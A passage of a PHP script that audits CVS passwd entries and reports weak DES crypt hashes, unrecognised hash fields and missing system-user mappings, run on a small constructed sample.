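        } elseif (strlen($hash) === 13) {
            $findings[] = "$where: traditional DES crypt hash, only 8 password characters count";
        } else {
            $findings[] = "$where: field is not a recognisable crypt(3) hash";
        }
        if ($sysUser === '') {
            // Without a third field the CVS user acts as the Unix account of the same name.
            $findings[] = "$where: no system user mapped, runs as Unix account '$user'";
        }
    }
    return $findings;
}

// Constructed sample: the three entries from the post plus one DES-style hash.
$sample = "anyone:\ntom:xyzkue\nmary:yuio:pubcvs\ndev:ab01FAX.bQRSU:pubcvs\n";
foreach (audit_cvs_passwd($sample) as $finding) {
    echo $finding, "\n";
}
```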
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁